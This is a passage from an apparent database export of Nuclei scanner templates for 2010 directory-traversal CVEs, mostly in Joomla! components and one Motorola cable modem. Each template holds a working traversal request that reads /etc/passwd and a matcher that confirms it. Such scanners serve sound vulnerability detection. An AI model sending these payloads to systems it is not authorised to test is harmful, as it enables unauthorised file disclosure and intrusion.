status\n status:\n - 200\n# digest: 480a00453043021f4fb71b63c3bd17e13086007edddf0deeb7717685fefb075a4fd05cc9745216022078dacb5768e7279c9408bceebe738d0d2ec037568513077d54f5acd5353b1920:922c64590222798bb761d5b6d8e72950", "hash": "f82100b61fe5196cca0b3431cc7e38e4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb2" }, "name": "CVE-2010-1980.yaml", "content": "id: CVE-2010-1980\n\ninfo:\n name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12085\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1980\n - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt\n - http://www.exploit-db.com/exploits/12085\n - http://bitbucket.org/roberto.aloi/joomla-flickr/changeset/64ebf6b25030\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1980\n cwe-id: CWE-22\n epss-score: 0.02401\n epss-percentile: 0.88823\n cpe: cpe:2.3:a:roberto_aloi:com_joomlaflickr:1.0.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: roberto_aloi\n product: com_joomlaflickr\n tags: cve2010,cve,lfi,edb,packetstorm,joomla,roberto_aloi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200f0601e14c88048f753466cb392bb15f315e270c83bea437c0c06416a294fae7022100c65c6038a18d80ebceddf7ddda1f30c914cb549720e81c05d46adaa1e145e889:922c64590222798bb761d5b6d8e72950", "hash": "6b6b351d9e621327c7d060be1851db0e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb3" }, "name": "CVE-2010-1981.yaml", "content": "id: CVE-2010-1981\n\ninfo:\n name: Joomla! Component Fabrik 2.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12087\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1981\n - http://packetstormsecurity.org/1004-exploits/joomlafabrik-lfi.txt\n - http://www.exploit-db.com/exploits/12087\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57571\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-1981\n cwe-id: CWE-22\n epss-score: 0.00656\n epss-percentile: 0.77311\n cpe: cpe:2.3:a:fabrikar:fabrik:2.0:*:*:*:*:joomla\\!:*:*\n metadata:\n max-request: 1\n vendor: fabrikar\n product: fabrik\n framework: joomla\\!\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,fabrikar,joomla\\!\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100eb093037fb061176dd3b11eb61772ebd05a8d5e6b7b77b7c78f9e104162f8085022100d573cfc124ecec2594c14755043485055a53bf9712c250c00c5bfcacabe64cee:922c64590222798bb761d5b6d8e72950", "hash": "b49f25ab6bc1ad980e34b7aa64523daa", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb4" }, "name": "CVE-2010-1982.yaml", "content": "id: CVE-2010-1982\n\ninfo:\n name: Joomla! Component JA Voice 2.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12121\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1982\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-1982\n cwe-id: CWE-22\n epss-score: 0.00477\n epss-percentile: 0.73222\n cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joomlart\n product: com_javoice\n tags: cve,cve2010,joomla,lfi,edb,joomlart\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009cbc325331da11e25f4fb8d31fd398ac39f41c26c89d567dfd2945557f4275270220384a57dbc3afa51cbb77526db5c0f891e93a2b9153a342bf1de2ccca20f1d5f2:922c64590222798bb761d5b6d8e72950", "hash": "a6b2ea82de55f50d14266b6a467f3e4b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb5" }, "name": "CVE-2010-1983.yaml", "content": "id: CVE-2010-1983\n\ninfo:\n name: Joomla! Component redTWITTER 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12055\n - https://nvd.nist.gov/vuln/detail/CVE-2010-1983\n - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt\n - http://www.exploit-db.com/exploits/12055\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/57511\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-1983\n cwe-id: CWE-22\n epss-score: 0.01815\n epss-percentile: 0.87898\n cpe: cpe:2.3:a:redcomponent:com_redtwitter:1.0b8:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: redcomponent\n product: com_redtwitter\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,redcomponent\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100da8e5ec0db4b337d02f25af0f867f89b847da04714f68f22e6be3b3be3f0abd40220060b76f49c5ea887ceb19ee81f19d9fb8153e344b22d53416492d8c1e1a99058:922c64590222798bb761d5b6d8e72950", "hash": "073bfaf781c6bfc2ee596c3acba38811", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb6" }, "name": "CVE-2010-2033.yaml", "content": "id: CVE-2010-2033\n\ninfo:\n name: Joomla! Percha Categories Tree 0.6 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2033\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2033\n cwe-id: CWE-22\n epss-score: 0.00826\n epss-percentile: 0.80104\n cpe: cpe:2.3:a:percha:com_perchacategoriestree:0.6:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: percha\n product: com_perchacategoriestree\n tags: cve,cve2010,packetstorm,joomla,lfi,percha\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c3752555bc7d339bf2c1724f079f24b3c89ea951d0df72c818784b0d6244d56b022100cb11f24b74cd4d7293908f618984904a38f18e87bd8f90ad95611e6724d742a3:922c64590222798bb761d5b6d8e72950", "hash": "5b69c0c84ce1be2d3edc315f906cacf6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb7" }, "name": "CVE-2010-2034.yaml", "content": "id: CVE-2010-2034\n\ninfo:\n name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34003\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2034\n - http://packetstormsecurity.org/1005-exploits/joomlaperchaia-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2034\n cwe-id: CWE-22\n epss-score: 0.00718\n epss-percentile: 0.7851\n cpe: cpe:2.3:a:percha:com_perchaimageattach:1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: percha\n product: com_perchaimageattach\n tags: cve2010,cve,edb,packetstorm,joomla,lfi,percha\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502203cc78169b7508d700ed726459776192de58dce4c12f877eb75653e67d8a63eb5022100d30e6a81d09d27b9a6ad73fe191f8bab5e7644a12639ed94e2a03a2db3b04d1f:922c64590222798bb761d5b6d8e72950", "hash": "624ea4a73d5ad83537089671934dbb78", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb8" }, "name": "CVE-2010-2035.yaml", "content": "id: CVE-2010-2035\n\ninfo:\n name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34006\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2035\n - http://packetstormsecurity.org/1005-exploits/joomlaperchagl-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2035\n cwe-id: CWE-22\n epss-score: 0.07071\n epss-percentile: 0.93832\n cpe: cpe:2.3:a:percha:com_perchagallery:1.6:beta:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: percha\n product: com_perchagallery\n tags: cve,cve2010,packetstorm,joomla,lfi,edb,percha\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cb5ec476643b95c64caa86cc061308c75ceace843e58db8bae08413f2160846602201dc89742c9b1a55df817ec772150de1c14e53494415f3a1e177701a94db23fb4:922c64590222798bb761d5b6d8e72950", "hash": "5e35cb9dee99de40e3ac8caa6c562a39", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eb9" }, "name": "CVE-2010-2036.yaml", "content": "id: CVE-2010-2036\n\ninfo:\n name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34004\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2036\n - http://packetstormsecurity.org/1005-exploits/joomlaperchafa-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2036\n cwe-id: CWE-22\n epss-score: 0.00718\n epss-percentile: 0.7851\n cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: percha\n product: com_perchafieldsattach\n tags: cve,cve2010,lfi,joomla,edb,packetstorm,percha\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009a903733a1bc7131d855c5d53d11c378d6476b6e613a596b0e25c59edcfd3f92022100d4bc9343ee7c9595b3e44b08de9ce86a8f2d0af8a44d8483514b8ef8f46c7f94:922c64590222798bb761d5b6d8e72950", "hash": "d62196dc6e3eb48286d92ad154695b3d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eba" }, "name": "CVE-2010-2037.yaml", "content": "id: CVE-2010-2037\n\ninfo:\n name: Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n This vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/34005\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2037\n - http://packetstormsecurity.org/1005-exploits/joomlaperchada-lfi.txt\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2037\n cwe-id: CWE-22\n epss-score: 0.00718\n epss-percentile: 0.7851\n cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: percha\n product: com_perchadownloadsattach\n tags: cve2010,cve,joomla,edb,packetstorm,lfi,percha\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022040f5ddf1305890a721c4c1b8140d7c149c2cd3ce17446937f2471e5bebc466d4022100e8a39a2b4cb386864faa905b2dfb3c53d36c6d18fd9fc211a1e6c2d3c1d221b5:922c64590222798bb761d5b6d8e72950", "hash": "6626e24d32fd9c454778b92e5ab70941", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ebb" }, "name": "CVE-2010-2045.yaml", "content": "id: CVE-2010-2045\n\ninfo:\n name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12595\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2045\n - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58574\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2045\n cwe-id: CWE-22\n epss-score: 0.01671\n epss-percentile: 0.86287\n cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dionesoft\n product: com_dioneformwizard\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,dionesoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ca00fa1c2e8785e665cbf491b2e108f921561c2dd2e87039ef156d77c44f40e5022100daf8e4b14c228b30e2c641a0c6af878823e71701c4282339b11d1f50b27f3795:922c64590222798bb761d5b6d8e72950", "hash": "5849003820349cfe0f3485a65031e796", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ebc" }, "name": "CVE-2010-2050.yaml", "content": "id: CVE-2010-2050\n\ninfo:\n name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12611\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2050\n - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt\n - http://www.vupen.com/english/advisories/2010/1159\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58619\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2050\n cwe-id: CWE-22\n epss-score: 0.03527\n epss-percentile: 0.90637\n cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: m0r0n\n product: com_mscomment\n tags: cve,cve2010,joomla,lfi,edb,packetstorm,m0r0n\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201528ba80abd9bbc78d30e40e479c27465861d3fa2dd697eb180617ea6e0d81f802202cab5a94649a0d4e9e866b78525516c49a7311601aafcac4bede2efda4bea42a:922c64590222798bb761d5b6d8e72950", "hash": "fe90aa9eb14ef1f752a4cb6db6044d3d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ebd" }, "name": "CVE-2010-2122.yaml", "content": "id: CVE-2010-2122\n\ninfo:\n name: Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n An attacker can retrieve arbitrary files from the server, potentially leading to unauthorized access or sensitive data exposure.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12623\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2122\n - https://www.exploit-db.com/exploits/12618\n - http://extensions.joomla.org/extensions/directory-a-documentation/downloads/10717\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58625\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2010-2122\n cwe-id: CWE-22\n epss-score: 0.01806\n epss-percentile: 0.87868\n cpe: cpe:2.3:a:joelrowley:com_simpledownload:0.9.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: joelrowley\n product: com_simpledownload\n tags: cve2010,cve,joomla,lfi,edb,joelrowley\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205817b1f254b7fb87cd0f69682290db1a8bb6187ebdfdf121e6ead47dc2d135c0022100d9b2ce8c2c9cda540a9e6893d6568d4c20c7dda27fa0dca249cb62083226c9eb:922c64590222798bb761d5b6d8e72950", "hash": "bb517332a923215fbc02e46271351fd1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ebe" }, "name": "CVE-2010-2128.yaml", "content": "id: CVE-2010-2128\n\ninfo:\n name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/12607\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2128\n - http://www.exploit-db.com/exploits/12607\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/58593\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2128\n cwe-id: CWE-22\n epss-score: 0.01242\n epss-percentile: 0.84048\n cpe: cpe:2.3:a:harmistechnology:com_jequoteform:1.0:b1:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: harmistechnology\n product: com_jequoteform\n tags: cve,cve2010,joomla,lfi,edb,harmistechnology\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e59aa470d7b6c5748d0e63fffbaa81a4831047b347273d58d3cb41ca77557c13022100ac7540e4284e4eab9793f192e0dea83d7673f2050021711441c420f87797fa77:922c64590222798bb761d5b6d8e72950", "hash": "7ae7c259c8545a57884d048645437d4c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ebf" }, "name": "CVE-2010-2259.yaml", "content": "id: CVE-2010-2259\n\ninfo:\n name: Joomla! Component com_bfsurvey - Local File Inclusion\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/10946\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2259\n - http://www.exploit-db.com/exploits/10946\n - http://www.tamlyncreative.com.au/software/forum/index.php?topic=641.0\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2010-2259\n cwe-id: CWE-22\n epss-score: 0.01671\n epss-percentile: 0.86287\n cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tamlyncreative\n product: com_bfsurvey_profree\n tags: cve,cve2010,joomla,lfi,edb,tamlyncreative\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100fe73e1a14455f4c4289bbb04699a0783bbdb34d80aed0e6f22d7f5126162aa1302205f819b7049294b93e97e102214b01063586165e91c8abc034d8ff56771617cd4:922c64590222798bb761d5b6d8e72950", "hash": "eeaabbbcc2f87fd3e553ce18e6adc220", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec0" }, "name": "CVE-2010-2307.yaml", "content": "id: CVE-2010-2307\n\ninfo:\n name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal\n author: daffainfo\n severity: medium\n description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) \"//\" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.\n impact: |\n An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise.\n remediation: Upgrade to a supported product version.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2307\n - https://www.exploit-db.com/exploits/12865\n - http://www.exploit-db.com/exploits/12865\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/59113\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2010-2307\n cwe-id: CWE-22\n epss-score: 0.00813\n epss-percentile: 0.81409\n cpe: cpe:2.3:h:motorola:surfboard_sbv6120e:sbv6x2x-1.0.0.5-scm-02-shpc:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: motorola\n product: surfboard_sbv6120e\n tags: cve2010,cve,iot,lfi,motorola,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100bbfdf3607b6347ba7d7420f35506f8f2cff5bcb10afcb6d67570bbc874f0ea98022100e12d0a6af4937bca526ed8962cf3d20fcdfde6f0e14e2153b2f73251c35b4125:922c64590222798bb761d5b6d8e72950", "hash": "0500d94a9c77d0d15631b083db5d502b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ec1" }, "name": "CVE-2010-2507.yaml", "content": "id: CVE-2010-2507\n\ninfo:\n name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/13981\n - https://nvd.nist.gov/vuln/detail/CVE-2010-2507\n - http://packetstormsecurity.org/1006-exploits/joomlapicasa2gallery-lfi.txt\n - 